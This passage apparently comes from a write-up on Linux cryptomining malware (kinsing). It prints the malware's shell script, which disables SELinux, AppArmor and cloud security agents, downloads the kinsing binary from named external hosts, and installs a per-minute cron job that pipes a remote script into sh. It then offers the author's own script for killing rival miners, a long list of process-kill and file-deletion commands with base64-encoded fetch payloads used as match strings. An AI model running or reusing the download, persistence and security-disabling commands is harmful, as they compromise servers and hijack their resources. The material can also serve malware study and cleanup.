-rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/update.sh rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib rm -rf /tmp/config.json chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok # Start to clean up competitors docker Mining service procedures #yum install -y docker.io || apt-get install docker.io; docker ps | grep "pocosow" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "monero" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{
print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{
print $3}' | xargs -I % docker rmi -f % # close selinux setenforce 0 echo SELINUX=disabled >/etc/selinux/config # close apparmor Security service service apparmor stop # No auto start systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{
print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis # Check if your host has any download commands LDR="wget -q -O -" if [ -s /usr/bin/curl ]; then LDR="curl" fi if [ -s /usr/bin/wget ]; then LDR="wget -q -O -" fi WGET="wget -O" if [ -s /usr/bin/curl ]; then WGET="curl -o" fi if [ -s /usr/bin/wget ]; then WGET="wget -O" fi # This is a tricky use MD5sum Whether the reference document has been modified If it is changed, it will destroy itself DIR="/tmp" if [ -e "/tmp/kinsing" ]; then if [ -w "/tmp/kinsing" ] && [ ! -d "/tmp/kinsing" ]; then if [ -x "$(command -v md5sum)" ]; then sum=$(md5sum /tmp/kinsing | awk '{ print $1 }') echo $sum case $sum in a71ad3167f9402d8c5388910862b16ae) echo "kinsing OK" ;; *) echo "kinsing wrong" rm -rf /tmp/kinsing sleep 1 ;; esac fi echo "P OK" else DIR=$(mktemp -d)/tmp mkdir $DIR echo "T DIR $DIR" fi else if [ -d "/var/tmp" ]; then DIR="/var/tmp" fi echo "P NOT EXISTS" fi # Steps to start cyclic download Still refer to the document MD5 value Very alert download() { if [ -x "$(command -v md5sum)" ]; then sum=$(md5sum $DIR/kinsing | awk '{ print $1 }') echo $sum case $sum in a71ad3167f9402d8c5388910862b16ae) echo "kinsing OK" ;; *) echo "kinsing wrong" download2 ;; esac else echo "No md5sum" download2 fi } download2() { $WGET $DIR/kinsing https://bitbucket.org/kimrakfl33/git/raw/master/kinsing chmod +x $DIR/kinsing if [ -x "$(command -v md5sum)" ]; then sum=$(md5sum $DIR/kinsing | awk '{ print $1 }') echo $sum case $sum in a71ad3167f9402d8c5388910862b16ae) echo "kinsing OK" ;; *) echo "kinsing wrong" download3 ;; esac else echo "No md5sum" download3 fi } download3() { $WGET $DIR/kinsing http://217.12.221.244/kinsing chmod +x $DIR/kinsing if [ -x "$(command -v md5sum)" ]; then sum=$(md5sum $DIR/kinsing | awk '{ print $1 }') echo $sum case $sum in a71ad3167f9402d8c5388910862b16ae) echo "kinsing OK" ;; *) echo "kinsing wrong" ;; esac else echo "No md5sum" fi } download SKL=t $DIR/kinsing # Write scheduled tasks to the background crontab -l | grep -e "195.3.146.118" | grep -v grep if [ $? -eq 0 ]; then echo "cron good" else ( crontab -l 2>/dev/null echo "* * * * * $LDR http://195.3.146.118/t.sh | sh > /dev/null 2>&1" ) | crontab - fi crontab -l | sed '/update.sh/d' | crontab - crontab -l | sed '/logo4/d' | crontab - crontab -l | sed '/logo9/d' | crontab - crontab -l | sed '/logo0/d' | crontab - crontab -l | sed '/logo/d' | crontab - crontab -l | sed '/tor2web/d' | crontab - crontab -l | sed '/jpg/d' | crontab - crontab -l | sed '/png/d' | crontab - crontab -l | sed '/tmp/d' | crontab - crontab -l | sed '/zmreplchkr/d' | crontab - crontab -l | sed '/aliyun.one/d' | crontab - crontab -l | sed '/3.215.110.66.one/d' | crontab - crontab -l | sed '/pastebin/d' | crontab - crontab -l | sed '/onion/d' | crontab - crontab -l | sed '/lsd.systemten.org/d' | crontab - crontab -l | sed '/shuf/d' | crontab - crontab -l | sed '/ash/d' | crontab - crontab -l | sed '/mr.sh/d' | crontab - crontab -l | sed '/185.181.10.234/d' | crontab -
# These timed tasks are combined with the above crontab -l 2>/dev/null Let's take a look at the regular tasks and security services of competitive product companies
ideas
- A virus of this type basically kills the mining programs of rival companies So learn from the barbarians and master their skills to control them Change his script and combine it with the script I gave you to make a script against most mining processes
Upgraded reverse mining script
#!/bin/bash
# Create a loop I thought I was going to empty crontab Therefore, the system's own scheduled tasks are not used
while [ "1" -eq "1" ]
do
# Kill these processes directly networkmanager I don't know much at present There should be another one networkservice Daemons and so on
/usr/bin/pkill -f networkmanager
/usr/bin/pkill -f kinsing
/usr/bin/pkill -f kdevtmpfsi
pkill kthreaddi
pkill sysrv007
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'log_' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'systemten' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netns' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'voltuned' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'darwin' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/dl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ddg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/pprt' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ppol' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '45.76.122.92' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.191.178' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.15.56.161' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '86s.jpg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AgdgACUD' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3XEzey2T' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'zXcDajSs' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3lmigMo' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AkMK4A2' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC030' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC031' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC032' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC033' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "C4iLM4L" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'gitee.com' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/java' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '104.248.4.162' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '89.35.39.78' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kthrotlds' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ksoftirqds' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netdns' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'watchdogs' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/udevd' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse3' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'j2.conf' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.156' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '83.220.169.247' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.203.146' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '144.217.45.45' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.181' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '176.31.6.16' | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "[email protected]" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "monerohash.com" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoxue | awk '{
print $2}' | xargs -I % kill -9 % netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{
print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{
print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % pgrep -f monerohash | xargs -I % kill -9 % pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % pgrep -f xzpauectgr | xargs -I % kill -9 % pgrep -f slxfbkmxtd | xargs -I % kill -9 % pgrep -f mixtape | xargs -I % kill -9 % pgrep -f addnj | xargs -I % kill -9 % pgrep -f 200.68.17.196 | xargs -I % kill -9 % pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % pgrep -f honvbsasbf.conf | xargs -I % kill -9 % pgrep -f mqdsflm.cf | xargs -I % kill -9 % pgrep -f stratum | xargs -I % kill -9 % pgrep -f lower.sh | xargs -I % kill -9 % pgrep -f ./ppp | xargs -I % kill -9 % pgrep -f cryptonight | xargs -I % kill -9 % pgrep -f ./seervceaess | xargs -I % kill -9 % pgrep -f ./servceaess | xargs -I % kill -9 % pgrep -f ./servceas | xargs -I % kill -9 % pgrep -f ./servcesa | xargs -I % kill -9 % pgrep -f ./vsp | xargs -I % kill -9 % pgrep -f ./jvs | xargs -I % kill -9 % pgrep -f ./pvv | xargs -I % kill -9 % pgrep -f ./vpp | xargs -I % kill -9 % pgrep -f ./pces | xargs -I % kill -9 % pgrep -f ./rspce | xargs -I % kill -9 % pgrep -f ./haveged | xargs -I % kill -9 % pgrep -f ./jiba | xargs -I % kill -9 % pgrep -f ./watchbog | xargs -I % kill -9 % pgrep -f ./A7mA5gb | xargs -I % kill -9 % pgrep -f kacpi_svc | xargs -I % kill -9 % pgrep -f kswap_svc | xargs -I % kill -9 % pgrep -f kauditd_svc | xargs -I % kill -9 % pgrep -f kpsmoused_svc | xargs -I % kill -9 % pgrep -f kseriod_svc | xargs -I % kill -9 % pgrep -f kthreadd_svc | xargs -I % kill -9 % pgrep -f ksoftirqd_svc | xargs -I % kill -9 % pgrep -f kintegrityd_svc | xargs -I % kill -9 % pgrep -f jawa | xargs -I % kill -9 % pgrep -f oracle.jpg | xargs -I % kill -9 % pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % pgrep -f 188.209.49.54 | xargs -I % kill -9 % pgrep -f 181.214.87.241 | xargs -I % kill -9 % pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 % pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % pgrep -f servim | xargs -I % kill -9 % pgrep -f kblockd_svc | xargs -I % kill -9 % pgrep -f native_svc | xargs -I % kill -9 % pgrep -f ynn | xargs -I % kill -9 % pgrep -f 65ccEJ7 | xargs -I % kill -9 % pgrep -f jmxx | xargs -I % kill -9 % pgrep -f 2Ne80nA | xargs -I % kill -9 % pgrep -f sysstats | xargs -I % kill -9 % pgrep -f systemxlv | xargs -I % kill -9 % pgrep -f watchbog | xargs -I % kill -9 % pgrep -f OIcJi1m | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f sysguard pkill -f networkservice pkill -f sysupdate pkill -f init12.cfg pkill -f nginxk pkill -f tmp/wc.conf pkill -f xmrig-notls pkill -f xmr-stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii rm -rf /usr/bin/config.json rm -rf /usr/bin/exin killall log_rot pkill -f log_rot rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/update.sh rm -rf /tmp/devtool rm -rf /tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf /tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/update.sh rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib rm -rf /tmp/config.json chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok # clear docker Viruses docker ps | grep "pocosow" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "monero" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{
print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{
print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{
print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{
